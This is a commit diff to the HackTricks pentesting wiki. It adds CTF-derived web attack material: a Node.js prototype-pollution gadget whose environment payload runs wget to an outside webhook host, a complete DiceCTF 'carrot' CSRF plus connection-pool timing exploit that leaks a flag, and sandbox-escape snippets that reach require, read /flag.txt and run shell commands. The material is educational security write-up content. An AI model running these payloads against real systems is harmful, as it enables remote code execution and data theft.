GITBOOK-4028: change request with no subject merged in GitBook

2023-08-08 08:05:16 +00:00 · 2023-08-08 08:05:16 +00:00 · 751055cd29
parent cfc006dba6
commit 751055cd29
4 changed files with 324 additions and 13 deletions
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -649,7 +649,7 @@
  * [XSS Tools](pentesting-web/xss-cross-site-scripting/xss-tools.md)
 * [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
 * [XS-Search/XS-Leaks](pentesting-web/xs-search.md)
-  * [Connection Pool Example](pentesting-web/xs-search/connection-pool-example.md)
+  * [Connection Pool Examples](pentesting-web/xs-search/connection-pool-example.md)
  * [Connection Pool by Destination Example](pentesting-web/xs-search/connection-pool-by-destination-example.md)
  * [Cookie Bomb + Onerror XS Leak](pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md)
  * [URL Max Length - Client Side](pentesting-web/xs-search/url-max-length-client-side.md)
--- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
+++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/prototype-pollution-to-rce.md
@ -7,7 +7,7 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>
@ -678,6 +678,29 @@ fork('/path/to/anything');
 {% endtab %}
 {% endtabs %}

+#### Relative require - 3
+
+Similar to the previous one, this was found in [**this writeup**](https://blog.huli.tw/2022/12/26/en/ctf-2022-web-js-summary/#balsn-ctf-2022-2linenodejs).
+
+```javascript
+// Requiring /opt/yarn-v1.22.19/preinstall.js
+Object.prototype["data"] = {
+  exports: {
+    ".": "./preinstall.js"
+  },
+  name: './usage'
+}
+Object.prototype["path"] = '/opt/yarn-v1.22.19'
+Object.prototype.shell = "node"
+Object.prototype["npm_config_global"] = 1
+Object.prototype.env = {
+  "NODE_DEBUG": "console.log(require('child_process').execSync('wget${IFS}https://webhook.site?q=2').toString());process.exit()//",
+  "NODE_OPTIONS": "--require=/proc/self/environ"
+}
+
+require('./usage.js')
+```
+
 ## VM Gadgets

 In the paper [https://arxiv.org/pdf/2207.11171.pdf](https://arxiv.org/pdf/2207.11171.pdf) is also indicated that the control of **`contextExtensions`** from some methods of the **`vm`** library could be used as a gadget.\
@ -706,7 +729,7 @@ In [**this commit**](https://github.com/nodejs/node/commit/0313102aaabb49f78156c
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>
--- a/pentesting-web/xs-search/connection-pool-example.md
+++ b/pentesting-web/xs-search/connection-pool-example.md
@ -1,4 +1,4 @@
-# Connection Pool Example
+# Connection Pool Examples

 <details>

@ -7,11 +7,13 @@
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>

+## Sekaictf2022 - safelist
+
 In the [**Sekaictf2022 - safelist**](https://github.com/project-sekai-ctf/sekaictf-2022/tree/main/web/safelist/solution) challenge, [**@Strellic\_**](https://twitter.com/Strellic\_) gives an example of how to use a **variation** of the **Connection Pool** technique to perform a **XS-Leak**.

 In this challenge, the goal is to exfiltrate a flag that will appear in the bots web session inside a post. These are the assets the attacker has:
@ -294,6 +296,222 @@ Same tactic but different code from [https://blog.huli.tw/2022/10/05/en/sekaictf
 </html>
 ```

+## DiceCTF 2022 - carrot
+
+In this case the first step of the exploit was to abuse a CSRF to modify the page where the flag is contained so it has **much more content** (and therefore loading it takes more time), and then **abuse the connection pool to measure the time it takes to access the page** that could be potentially having the flag.
+
+In the exploit you can see:
+
+* Abuse CSRF
+* Occupy all the sockets but 1
+* Calibrate the response
+* Start bruteforcing by accessing the potential page with the flag
+  * The potential page will be accessed and immediately an attackers controlled URL will also be accessed to check how much time both requests take.
+
+```html
+<h1>DiceCTF 2022 web/carrot</h1>
+
+<p>Step 1: CSRF the admin user, to set a super long title for the flag note (LAX + POST form only possible for 2 minutes after cookies is created)</p>
+<button onclick="csrf()">do csrf</button>
+<p>Step 2: XS-Search with <a href="https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/">connection-pool timing leak</a>, we have to use window.open (LAX cookie)</p>
+
+<button onclick="popunder()">open popup</button>
+<button onclick="exhaust_sockets()">open 255 connections</button>
+<button onclick="oracle('dice{abc')">test search "abc" (slow)</button>
+<button onclick="oracle('dice{xxx')">test search "xxx" (fast)</button>
+<br>
+<br>
+<h2 id=output></h2>
+<br>
+<form id=x action="" method="POST" style="display:none;">
+	<input type="text" name="title" placeholder="title">
+	<br><br>
+	<input type="number" name="priority" placeholder="priority" value=9999>
+	<br><br>
+	<textarea name="content" placeholder="content" rows="5" cols="20"></textarea>
+	<br><br>
+	<input type="submit" value="submit">
+</form>
+
+<script>
+
+// this is send is used as logging
+LOG = 'Starting'
+// 255 in normal chrome, 99 in headless
+SOCKETLIMIT = 255;
+// default
+TIMELIMIT = 800;
+INSTANCE = ''
+MYSERVER = `example.com`
+
+const sleep = (ms) => {
+    return new Promise(resolve => {
+        setTimeout(resolve, ms);
+    });
+}
+
+const time_fetch = async() => {
+    let test_server_url = `https://${MYSERVER}/?${LOG}`;
+    let start = window.performance.now();
+    try {
+        await fetch(test_server_url, {
+            mode: 'no-cors'
+        });
+    } catch (e) {
+        console.log(e);
+    }
+    let end = window.performance.now();
+    return end - start;
+}
+
+const fetch_sleep_long = (i) => {
+    // 40s sleep
+    return fetch(`https://${i}.${MYSERVER}/40sleep`, {
+        mode: 'no-cors'
+    });
+}
+
+const fetch_sleep_short = (i) => {
+    // 0.25s sleep
+    return fetch(`https://${i}.${MYSERVER}/ssleep`, {
+        mode: 'no-cors'
+    });
+}
+
+const block_socket = async (i) => {
+    fetch_sleep_long(i);
+    // needed?
+    await sleep(0);
+}
+
+const exhaust_sockets = async() => {
+    let i = 0
+    for (; i < SOCKETLIMIT; i++) {
+        block_socket(i);
+    }
+    console.log(`Used ${i} connections`);
+}
+
+const timeit = async (url, popup) => {
+    return new Promise(async (r) => {
+
+        popup.location = url;
+        // needed?
+        await sleep(50)
+
+        let val = await time_fetch()
+        r(val)
+    });
+}
+
+// const alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-}!"#$%&\'()*+,-./:;<=>?@[\\]^`|~{'.split('');
+const alphabet = 'abcdefghijklmnopqrstuvwxyz}_'.split('');
+// const alphabet = 'abcdef}'.split('');
+
+const oracle = async (search) => {
+    let url = `https://carrot-${INSTANCE}.mc.ax/tasks?search=${search}`
+    let t = await timeit(url, WINBG)
+
+    LOG = `${search}:${t}`
+    console.log(`${search}:${t}`)
+
+    return t > TIMELIMIT 
+}
+
+const brute = async (flag) => {
+    for (const char of alphabet) {
+        if (await oracle(flag + char)) {
+            return char;
+        }
+    }
+    return false;
+}
+
+const calibrate = async () => {
+    return new Promise(async (r) => {
+        // slow
+        let url1 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=dice{`
+        let t1 = await timeit(url1, WINBG)
+        console.log(`slow:${t1}`)
+        // fast
+        let url2 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=XXXXXXXXXX`
+        let t2 = await timeit(url2, WINBG)
+        console.log(`fast:${t2}`)
+        return r((t1 + t2) / 2)
+    });
+
+}
+
+const exploit = async(flag = '') => {
+    console.log('Starting')
+    // dont go to fast plz :) 
+    console.log(`waiting 3s`)
+    await sleep(3000)
+    // exaust sockets
+    await exhaust_sockets()
+    await sleep(2000)
+    LOG = `Calibrating`
+    TIMELIMIT = await calibrate()
+    LOG = `TIMELIMIT:${TIMELIMIT}`
+    console.log(`timelimit:${TIMELIMIT}`)
+    await sleep(2000)
+    let last;
+    while (true) {
+        last = await brute(flag);
+        if (last === false) {
+            return flag;
+        } 
+        else {
+            flag += last;
+            output.innerText = flag;
+            if(last === '}'){
+                return flag
+            }
+        }
+    }
+}
+
+const popunder = () => {
+    if (window.opener) {
+            WINBG = window.opener
+    } 
+    else {
+        WINBG = window.open(location.href, target="_blank")
+        location = `about:blank`
+    }
+}
+
+const csrf = async () => {
+    x.action = `https://carrot-${INSTANCE}.mc.ax/edit/0`
+    x.title.value = "A".repeat(1000000)
+    x.submit()
+}
+
+window.onload = () => {
+    let p = new URL(location).searchParams;
+    if(!p.has('i')){
+        console.log(`no INSTANCE`)
+        return
+    }
+    INSTANCE = p.get('i')
+    // step 1 
+    if(p.has('csrf')){
+        csrf()
+        return
+    }
+    // step 2
+    if (p.has('exploit')) {
+        // window open is ok in headless :)
+        popunder()
+        
+        exploit('dice{')
+    }
+}
+</script>
+```
+
+
+
 <details>

 <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
@ -301,7 +519,7 @@ Same tactic but different code from [https://blog.huli.tw/2022/10/05/en/sekaictf
 * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).

 </details>
--- a/pentesting-web/xss-cross-site-scripting/README.md
+++ b/pentesting-web/xss-cross-site-scripting/README.md
@ -196,7 +196,7 @@ Some **examples**:

 When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
 For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
-_**Note: A HTML comment can be closed using\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_
+_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_

 In this case and if no black/whitelisting is used, you could use payloads like:

@ -964,7 +964,7 @@ const char* const kSupportedJavascriptTypes[] = {
 The answer is:

 * **module** (default, nothing to explain)
-* \*\*\*\*[**webbundle**](https://web.dev/web-bundles/): Web Bundles is a feature that you can package a bunch of data (HTML, CSS, JS…) together into a **`.wbn`** file.
+* [**webbundle**](https://web.dev/web-bundles/): Web Bundles is a feature that you can package a bunch of data (HTML, CSS, JS…) together into a **`.wbn`** file.

 ```html
 <script type="webbundle">
@ -976,7 +976,7 @@ The answer is:
 The resources are loaded from the source .wbn, not accessed via HTTP
 ```

-* \*\*\*\*[**importmap**](https://github.com/WICG/import-maps)**:** Allows to improve the import syntax
+* [**importmap**](https://github.com/WICG/import-maps)**:** Allows to improve the import syntax

 ```html
 <script type="importmap">
@ -997,7 +997,7 @@ import { partition } from "lodash";

 This behaviour was used in [**this writeup**](https://github.com/zwade/yaca/tree/master/solution) to remap a library to eval to abuse it can trigger XSS.

-* \*\*\*\*[**speculationrules**](https://github.com/WICG/nav-speculation)**:** This feature is mainly to solve some problems caused by pre-rendering. It works like this:
+* [**speculationrules**](https://github.com/WICG/nav-speculation)**:** This feature is mainly to solve some problems caused by pre-rendering. It works like this:

 ```html
 <script type="speculationrules">
@ -1050,7 +1050,11 @@ For example in [**this writeup**](https://gitea.nitowa.xyz/nitowa/PlaidCTF-YACA)

 ### Chrome Cache to XSS

-### XS Jails
+{% content-ref url="chrome-cache-to-xss.md" %}
+[chrome-cache-to-xss.md](chrome-cache-to-xss.md)
+{% endcontent-ref %}
+
+### XS Jails Escape

 If you are only have a limited set of chars to use, check these other valid solutions for XSJail problems:

@ -1085,6 +1089,72 @@ with(this)
 // https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
 ```

+If **everything is undefined** before executing untrusted code (like in [**this writeup**](https://blog.huli.tw/2022/02/08/en/what-i-learned-from-dicectf-2022/#miscx2fundefined55-solves)) it's possible to generate useful objects "out of nothing" to abuse the execution of arbitrary untrusted code:
+
+* Using import()
+
+```javascript
+// although import "fs" doesn’t work, import('fs') does.
+import("fs").then(m=>console.log(m.readFileSync("/flag.txt", "utf8")))
+```
+
+* Accessing `require` indirectly
+
+[According to this](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) modules are wrapped by Node.js within a function, like this:
+
+```javascript
+(function (exports, require, module, __filename, __dirname) {
+    // our actual module code
+});
+```
+
+Therefore, if from that module we can **call another function**, it's possible to use `arguments.callee.caller.arguments[1]` from that function to access **`require`**:&#x20;
+
+{% code overflow="wrap" %}
+```javascript
+(function(){return arguments.callee.caller.arguments[1]("fs").readFileSync("/flag.txt", "utf8")})()
+```
+{% endcode %}
+
+In a similar way to the previous example, it's possible to **use error handlers** to access the **wrapper** of the module and get the **`require`** function:
+
+```javascript
+try {
+	null.f()
+} catch (e) {
+	TypeError = e.constructor
+}
+Object = {}.constructor
+String = ''.constructor
+Error = TypeError.prototype.__proto__.constructor
+function CustomError() {
+	const oldStackTrace = Error.prepareStackTrace
+	try {
+		Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
+		Error.captureStackTrace(this)
+		this.stack
+	} finally {
+		Error.prepareStackTrace = oldStackTrace
+	}
+}
+function trigger() {
+	const err = new CustomError()
+	console.log(err.stack[0])
+	for (const x of err.stack) {
+		// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
+		const fn = x.getFunction()
+		console.log(String(fn).slice(0, 200))
+		console.log(fn?.arguments)
+		console.log('='.repeat(40))
+		if ((args = fn?.arguments)?.length > 0) {
+			req = args[1]
+			console.log(req('child_process').execSync('id').toString())
+		}
+	}
+}
+trigger()
+```
+
 ### Obfuscation & Advanced Bypass

 * **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
@ -1359,9 +1429,9 @@ You can also use: [https://xsshunter.com/](https://xsshunter.com)
 <div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
 ```

-### Find Hidden Content
+### Regex - Access Hidden Content

-From [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) it's possible to learn that even if some values dissapear from JS, it's still possible to find them in JS attributtes in different objects. For example, an input of a REGEX is still possible to find it after the value of the input of the regex was removed:
+From [**this writeup**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) it's possible to learn that even if some values disappear from JS, it's still possible to find them in JS attributes in different objects. For example, an input of a REGEX is still possible to find it after the value of the input of the regex was removed:

 ```javascript
 // Do regex with flag